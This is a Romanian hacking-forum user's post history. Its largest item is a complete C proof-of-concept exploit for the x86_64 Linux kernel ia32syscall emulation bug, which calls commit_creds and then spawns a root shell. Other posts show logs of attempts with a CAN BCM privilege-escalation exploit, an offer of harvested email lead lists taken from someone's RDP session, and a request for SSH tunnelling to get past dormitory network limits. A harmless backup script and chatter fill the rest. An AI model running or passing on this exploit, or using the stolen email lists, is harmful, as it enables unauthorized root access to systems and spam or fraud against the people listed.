-
Posts
2637 -
Joined
-
Last visited
-
Days Won
89
Everything posted by Zatarra
-
Ambele. Pt linux stiu 2 dar mai am 1, iar pt windows stiu 1 si mai am tot 1 As putea face rost si de al doilea de linux, daca dau un search prin turnul cu CD`uri, dar nu prea vad rostul.
-
Feedback: L`am probat si e slab rau. Deschide foarte multe ferestre si manca destule resurse. In + astepti o vesnicie pana le verifica pe toate. Poate pe viitor voi face o proba cu un user si o parola presetata. Pana atunci raman la ce am eu . Ms oricum
-
On: Frate lasa conquiztador.. ala e un site de incultura generala cu o groaza de intrebari eronate si stupide. Pune mana si citeste o carte daca vrei sa te "cultivi". Off: Riscam sa pierdem jumate din userii "importanti"
-
Cripteaza si tu cu ROT13.. hackereii nu au auzit de asa ceva.. Atat metoda de cryptare cat si de decryptare e banala
-
Die-hard bug bytes Linux kernel for second time
Zatarra replied to Nytro's topic in Stiri securitate
Vad ca nu l`ai pus sus.. deci il pun eu Tineti minte acesta este un POC!!! * exploit for x86_64 linux kernel ia32syscall emulation (again) * rediscovered by ben hawkes * with help from robert swiecki and tavis ormandy * * original vulnerability discovered by Wojciech Purczynski * * original exploit by * Robert Swiecki <robert_at_swiecki.net> * Przemyslaw Frasunek <venglin_at_freebsd.lublin.pl> * Pawel Pisarczyk <pawel_at_immos.com.pl> * * kernel priv escalation code borrowed from spender * */ #include <sys/types.h> #include <sys/wait.h> #include <sys/ptrace.h> #include <inttypes.h> #include <sys/reg.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <string.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int kernelmodecode(void *file, void *vma) { commit_creds(prepare_kernel_cred(0)); return -1; } unsigned long get_symbol(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; int ret = 0, oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) return 0; oldstyle = 1; } while (ret != EOF) { if (!oldstyle) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname); } else { ret = fscanf(f, "%p %s\n", (void **) &addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) { continue; } p = strrchr(sname, '_'); if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') { p--; } *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { printf("resolved symbol %s to %p\n", name, (void *) addr); fclose(f); return addr; } } fclose(f); return 0; } static void docall(uint64_t *ptr, uint64_t size) { commit_creds = (_commit_creds) get_symbol("commit_creds"); if (!commit_creds) { printf("symbol table not available, aborting!\n"); exit(1); } prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); if (!prepare_kernel_cred) { printf("symbol table not available, aborting!\n"); exit(1); } uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF); printf("mapping at %lx\n", tmp); if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { printf("mmap fault\n"); exit(1); } for (; (uint64_t) ptr < (tmp + size); ptr++) *ptr = (uint64_t)kernelmodecode; __asm__("\n" "\tmovq $0x101, %rax\n" "\tint $0x80\n"); printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid()); execl("/bin/sh", "bin/sh", NULL); printf("no /bin/sh ??\n"); exit(0); } int main(int argc, char **argv) { int pid, status, set = 0; uint64_t rax; uint64_t kern_s = 0xffffffff80000000; uint64_t kern_e = 0xffffffff84000000; uint64_t off = 0x0000000800000101 * 8; if (argc == 4) { docall((uint64_t*)(kern_s + off), kern_e - kern_s); exit(0); } if ((pid = fork()) == 0) { ptrace(PTRACE_TRACEME, 0, 0, 0); execl(argv[0], argv[0], "2", "3", "4", NULL); perror("exec fault"); exit(1); } if (pid == -1) { printf("fork fault\n"); exit(1); } for ( { if (wait(&status) != pid) continue; if (WIFEXITED(status)) { printf("Process finished\n"); break; } if (!WIFSTOPPED(status)) continue; if (WSTOPSIG(status) != SIGTRAP) { printf("Process received signal: %d\n", WSTOPSIG(status)); break; } rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); if (rax == 0x000000000101) { if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) { printf("PTRACE_POKEUSER fault\n"); exit(1); } set = 1; //rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); } if ((rax == 11) && set) { ptrace(PTRACE_DETACH, pid, 0, 0); for( sleep(10000); } if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) { printf("PTRACE_SYSCALL fault\n"); exit(1); } } return 0; } -
Mersi. O sa`l probez mai pe seara si revin cu edit. Din cate vad eu iti trebuie si un pass_file.
-
Vorbeste frate cu un prieten ceva si spunei sa-ti tina el serverul, nu cred ca ar fi un sacrificiu chiar asa mare. Zici ca tu deti date de la FBI, CIA, NSA si multe alte organizatii "mondene" ca sa ai backup plan pentru alimentare.. Off: Frate pe cuvant ca asta e topicul zilei
-
Mersi fain frate.. Numa bine am aflat ca merge Team Viewer si pt Linux P.S. Daca are cineva idee cum as putea sa fac ssh tunneling in Ubuntu 10.04 sa imi dea un PM. Ms anticipat P.P.S. Tin sa precizez ca vreau sa trec de restictiile din camin si ca am servere externe cu 443 pentru ssh-tunneling.
-
Sunt puse in caz ca nu vezi Edit: Deja au fost si downloadate de cateva ori acum totul depinde de viteza
-
Am intrat intr`un RDP mai vechi si am dat peste mailul unui hackerel. Sunt vre`o 30 de liste de mail-uri, dar cred ca sunt spamate deja. In schimb am ceva relativ fresh pt voi. Gasiti aici: emails 1 txt the leadsss txt P.S. Primul venit primul servit Pace
-
Salut. Ce crezi tu ca facem noi pe aici?
-
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
Zatarra replied to Nytro's topic in Exploituri
Nu pot sa cred.. inca un fail book@portia:~$ uname -a Linux portia 2.6.32-24-generic-pae #41-Ubuntu SMP Thu Aug 19 02:43:57 UTC 2010 i686 GNU/Linux book@portia:~$ gcc a.c -o a book@portia:~$ chmod +x a book@portia:~$ ./a [+] looking for symbols... [+] resolved symbol commit_creds to 0xc0176210 [+] resolved symbol prepare_kernel_cred to 0xc0176550 [+] setting up exploit payload... [+] creating PF_CAN socket... [+] connecting PF_CAN socket... [+] clearing out any active OPs via RX_DELETE... [+] removing any active user-owned shmids... [+] massaging kmalloc-96 SLUB cache with dummy allocations [+] corrupting BCM OP with truncated allocation via RX_SETUP... [-] kernel rejected malformed CAN header book@portia:~$ id uid=1019(book) gid=1002(company) groups=1002(company) book@portia:~$ -
Mersi fain frate.. mare domn
-
De ce crezi ca ar fi asa periculos?
-
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
Zatarra replied to Nytro's topic in Exploituri
Update-ul depinde in mare parte de repositories, el practic de acolo ia ce ii nou. -
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
Zatarra replied to Nytro's topic in Exploituri
Probat again pe Ubuntu 10.04.1 LTS \n \l (kernel = 2.6.32-24-generic) and fail ed3@daneel:~$ id uid=1006(ed3) gid=1006(ed3) groups=1006(ed3) ed3@daneel:~$ ./s [+] looking for symbols... [+] resolved symbol commit_creds to 0xffffffff8108bd90 [+] resolved symbol prepare_kernel_cred to 0xffffffff8108c170 [+] setting up exploit payload... [+] creating PF_CAN socket... [+] connecting PF_CAN socket... [+] clearing out any active OPs via RX_DELETE... [+] removing any active user-owned shmids... [+] massaging kmalloc-96 SLUB cache with dummy allocations [-] inconsistency detected with SLUB cache allocation, please try again ed3@daneel:~$ -
Il incerc mai pe seara si revin cu edit. Sper sa mearga
-
Va pun si eu un backup script luat dintr-un server. Poate cineva are nevoie de el ;-) Daca avetzi intrebari nu ezitati sa le postati #!/bin/bash # # creates backups of essential files # DATA="/home /opt /root " CONFIG="/etc /var/lib /var/named" DATABACKUP="/mnt/drive2/backup/bofh/data" CONFIGBACKUP="/mnt/drive2/backup/bofh/config" DATABASEBACKUP="/mnt/drive2/backup/bofh/database" LIST="/mnt/drive2/backlist_$$.txt" # echo "Starting backup at `date +%Y-%m-%d\ %H:%M:%S`" echo "" set $(date) # if test "$1" = "Mon" ; then # weekly a full backup of all data and config. settings: # echo "Performing Full Data Backup..." tar cfz "/mnt/drive2/backup/bofh/data/data_full_$6-$2-$3.tgz" $DATA echo "Removing incremental data backups..." rm -f /mnt/drive2/backup/bofh/data/data_diff* echo "Removing two week old full backup..." find $DATABACKUP -depth -type f \( -ctime +13 -o -mtime +13 \) -print > $LIST rm -f `cat $LIST` # echo "" echo "Performing Full Config Backup..." tar cfz "/mnt/drive2/backup/bofh/config/config_full_$6-$2-$3.tgz" $CONFIG echo "Removing incremental config backups..." rm -f /mnt/drive2/backup/bofh/config/config_diff* echo "Removing two week old full config backup..." find $CONFIGBACKUP -depth -type f \( -ctime +13 -o -mtime +13 \) -print > $LIST rm -f `cat $LIST` else # incremental backup: # echo "Performing Incremental Data Backup..." find $DATA -depth -type f \( -ctime -1 -o -mtime -1 \) -print > $LIST tar cfzT "/mnt/drive2/backup/bofh/data/data_diff_$6-$2-$3.tgz" "$LIST" rm -f "$LIST" # echo "" echo "Performing Incremental config Backup..." find $CONFIG -depth -type f \( -ctime -1 -o -mtime -1 \) -print > $LIST tar cfzT "/mnt/drive2/backup/bofh/config/config_diff_$6-$2-$3.tgz" "$LIST" rm -f "$LIST" fi # # echo "" echo "Done!" echo "" echo "------------------------------------------------------------------------" echo "Finished: `date +%Y-%m-%d\ %H:%M:%S`" echo "------------------------------------------------------------------------" echo "" exit 0
-
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
Zatarra replied to Nytro's topic in Exploituri
Super. +rep pt tutorial, mie unul sincer mi-a fost lene sa incerc pe Ubuntu -
Adriane, cate minute te tine in medie o linie? Si poti sa faci cumva sa bage lini automat cand sunt libere?
-
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
Zatarra replied to Nytro's topic in Exploituri
Probat pe Centos: Linux localhost.localdomain 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux Si nimic.. [+] looking for symbols... [-] symbol table not availabe, aborting! [-] symbol table not availabe, aborting! [+] setting up exploit payload... [+] creating PF_CAN socket... [-] kernel lacks CAN packet family support [http@localhost ~]$ BTW: A mai obtinut cineva asta la compilare? s.c: In function trigger: s.c:544: warning: cast from pointer to integer of different size s.c:571: warning: cast from pointer to integer of different size -
Adriane pune si tu undeva sipscan7.1, iti mai trebuie ceva la el inafara de curl? (mail`ul nu ma intereseaza)
-
Tipic romanesc.. chiar astazi vorbeam cu un fost coleg de liceu care ii la academie.. ii plin de lingai si sifonari acolo, pacat ca pedepsele la academie sunt mai nasoale. Anyway: Respect Synthesis
-
Rabdare in primul rand
-
Adriane daca scoti versiunea da si tu un pm sau posteaza pe aici pe undeva.. poate suntem interesati ;-) daca ai nevoie de ceva idei PM me. PS Trimite si mie o lista cu prefixe te rog